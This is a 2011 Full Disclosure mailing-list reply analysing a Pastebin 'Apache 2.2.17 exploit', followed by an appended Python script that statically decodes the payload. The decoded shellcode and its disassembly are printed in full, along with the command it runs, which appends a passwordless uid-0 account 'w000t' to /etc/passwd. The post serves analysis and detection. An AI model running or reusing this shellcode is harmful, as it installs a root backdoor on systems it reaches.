Full Disclosure mailing list archives
Re: Apache 2.2.17 exploit?
From: nix () myproxylists com
Date: Mon, 3 Oct 2011 17:57:35 +0300
I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren
I decoded shellcode a bit. Looks quite trash to me.

ë*^1À^ÈF^G^ÈF ^ÈFG^ÉvI^Í^^H^É^M^Í^^K^É^Q^ÉFU°^K^Éó^ÍNI^ÍVUÍ^ÀèÑÿÿÿ /bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD

Here's disassembly:

00000000  EB2A            jmp short 0x2c
00000002  5E              pop esi
00000003  31C0            xor eax,eax
00000005  884607          mov [esi+0x7],al
00000008  88460A          mov [esi+0xa],al
0000000B  884647          mov [esi+0x47],al
0000000E  897649          mov [esi+0x49],esi
00000011  8D5E08          lea ebx,[esi+0x8]
00000014  895E4D          mov [esi+0x4d],ebx
00000017  8D5E0B          lea ebx,[esi+0xb]
0000001A  895E51          mov [esi+0x51],ebx
0000001D  894655          mov [esi+0x55],eax
00000020  B00B            mov al,0xb
00000022  89F3            mov ebx,esi
00000024  8D4E49          lea ecx,[esi+0x49]
00000027  8D5655          lea edx,[esi+0x55]
0000002A  CD80            int 0x80
0000002C  E8D1FFFFFF      call dword 0x2
00000031  2F              das
00000032  62696E          bound ebp,[ecx+0x6e]
00000035  2F              das
00000036  7368            jnc 0xa0
00000038  232D63232F62    and ebp,[dword 0x622f2363]
0000003E  696E2F6563686F  imul ebp,[esi+0x2f],dword 0x6f686365
00000045  207730          and [edi+0x30],dh
00000048  3030            xor [eax],dh
0000004A  743A            jz 0x86
0000004C  3A30            cmp dh,[eax]
0000004E  3A30            cmp dh,[eax]
00000050  3A7334          cmp dh,[ebx+0x34]
00000053  66656D          gs insw
00000056  3064653A        xor [ebp+0x3a],ah
0000005A  2F              das
0000005B  726F            jc 0xcc
0000005D  6F              outsd
0000005E  743A            jz 0x9a
00000060  2F              das
00000061  62696E          bound ebp,[ecx+0x6e]
00000064  2F              das
00000065  626173          bound esp,[ecx+0x73]
00000068  68203E3E20      push dword 0x203e3e20
0000006D  2F              das
0000006E  657463          gs jz 0xd4
00000071  2F              das
00000072  7061            jo 0xd5
00000074  7373            jnc 0xe9
00000076  7764            ja 0xdc
00000078  234141          and eax,[ecx+0x41]
0000007B  41              inc ecx
0000007C  41              inc ecx
0000007D  42              inc edx
0000007E  42              inc edx
0000007F  42              inc edx
00000080  42              inc edx
00000081  43              inc ebx
00000082  43              inc ebx
00000083  43              inc ebx
00000084  43              inc ebx
00000085  44              inc esp
00000086  44              inc esp
00000087  44              inc esp
00000088  44              inc esp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
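What the disassembly above actually sets up, replayed statically in Python as an added example that is not part of the original post: the bytes are rebuilt from the hex column, the three NUL stores and the argv/envp pointer stores are applied to a memory model, and the execve(2) arguments plus the /etc/passwd line the payload would append are read back; function names and the final uid-0/empty-password check are mine, not from the thread.

```python
import re
import struct

# Constructed from the hex column of the disassembly above: 49 bytes of code,
# then the string data whose address `call dword 0x2` pushes for `pop esi`.
CODE = bytes.fromhex(
    "eb2a5e31c088460788460a884647897649"
    "8d5e08895e4d8d5e0b895e51894655b00b"
    "89f38d4e498d5655cd80e8d1ffffff"
)
DATA = b"/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"
SHELLCODE = CODE + DATA
ESI = len(CODE)  # after the call/pop, esi points at DATA (offset 0x31)

def cstring(mem, off):
    return mem[off:mem.index(b"\0", off)].decode()

def extract_execve_args(shellcode, esi):
    """Replay the stores made before `int 0x80` (eax is 0 from xor eax,eax)
    and read back the execve(2) arguments: ebx=path, ecx=argv, edx=envp."""
    # The dword store at esi+0x55 reaches one byte past the 16-byte filler,
    # so give the model a little stack slack after the buffer.
    mem = bytearray(shellcode) + bytearray(16)
    for off in (0x07, 0x0A, 0x47):           # mov [esi+off],al -> '#' becomes NUL
        mem[esi + off] = 0
    for off, val in ((0x49, esi), (0x4D, esi + 8), (0x51, esi + 0xB), (0x55, 0)):
        struct.pack_into("<I", mem, esi + off, val)  # argv[0..2], then NULL
    argv, p = [], esi + 0x49                 # ecx = esi+0x49
    while (ptr := struct.unpack_from("<I", mem, p)[0]) != 0:
        argv.append(cstring(mem, ptr))
        p += 4
    envp0 = struct.unpack_from("<I", mem, esi + 0x55)[0]  # edx: the same NULL dword
    return cstring(mem, esi), argv, envp0    # ebx = esi

PASSWD_LINE = re.compile(r"/bin/echo (\S+) >> /etc/passwd$")

def appended_passwd_entry(command):
    """Parse the passwd(5) line the `-c` command would append."""
    fields = PASSWD_LINE.search(command).group(1).split(":")
    name, pw, uid, gid, gecos, home, shell = fields
    return {"name": name, "password": pw, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell}

def is_passwordless_root(entry):
    """Host check: a uid-0 account with an empty password field is a backdoor."""
    return entry["uid"] == 0 and entry["password"] == ""

if __name__ == "__main__":
    print(extract_execve_args(SHELLCODE, ESI))
```

The same `is_passwordless_root` check, run over every line of a host's /etc/passwd, is how you would spot this payload after the fact, since the shellcode leaves no process behind once the echo has run.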